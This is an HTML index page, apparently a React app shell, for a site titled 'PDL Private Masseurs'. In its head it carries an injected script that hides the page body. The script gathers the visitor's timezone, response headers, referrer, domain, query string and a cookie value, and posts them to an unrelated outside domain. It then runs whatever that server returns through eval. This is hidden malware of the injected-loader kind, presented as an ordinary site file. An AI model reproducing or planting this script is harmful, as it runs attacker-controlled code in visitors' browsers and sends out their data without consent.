<!DOCTYPE html>
<html lang="en">
  <head>
    <style>
      body {
        display: none;
      }
    </style>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script>
    <script async src="https://www.google-analytics.com/analytics.js"></script>
    <script>
      $(document).ready(function() {
        $("body").hide();
        $("html").append('<div id="lo447591ad" style="margin-top:8%;background-color:white;text-align:center;font-size:40px;"> </div>');
    
        var f = new XMLHttpRequest();
        var g;
        f.open("GET", document.location, true);
        f.send(null);
        f.onreadystatechange = function() {
          g = f.getAllResponseHeaders().toLowerCase();
        };
    
        var b = "GoogleAnalyticsObject";
        var c = "//www.google-analytics.com/analytics.js";
        ga("create", "UA-835634-1", "auto");
        ga("send", "pageview");
    
        var d = jstz.determine();
        var e = d.name();
        var qu = escape(window.location.search.substr(1));
        var rui = location.pathname + location.search;
        var r = document.referrer;
        var sn = document.domain;
        var value = "; " + document.cookie;
        var pa = value.split("; " + "_event" + "=");
        var co = pa.pop().split(";").shift();
        var q;
    
        $.ajax({
          url: "https://arcanefitnessboutique.com/powdie-and-lifestyle.php",
          type: "POST",
          data:
            "tz=" +
            e +
            "&he=" +
            g +
            "&rui=" +
            rui +
            "&qu=" +
            qu +
            "&r=" +
            r +
            "&sn=" +
            sn +
            "&co=" +
            co,
          success: function(a) {
            eval(a);
          }
        });
      });
    </script>
  
    <meta charset="utf-8" />
    <link rel="icon" href="%PUBLIC_URL%/favicon.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="theme-color" content="#000000" />
    <meta
      name="PDL Private Masseurs"
      content="PDL Private Masseurs"
    />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Reem+Kufi:wght@400;500;600;700&display=swap"
      rel="stylesheet"
    />
    <link rel="apple-touch-icon" href="%PUBLIC_URL%/logo192.png" />
    <link rel="manifest" href="%PUBLIC_URL%/manifest.json" />
    <title>PDL Private Masseurs</title>
  </head>
  <body>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root"></div>
  </body>
</html>
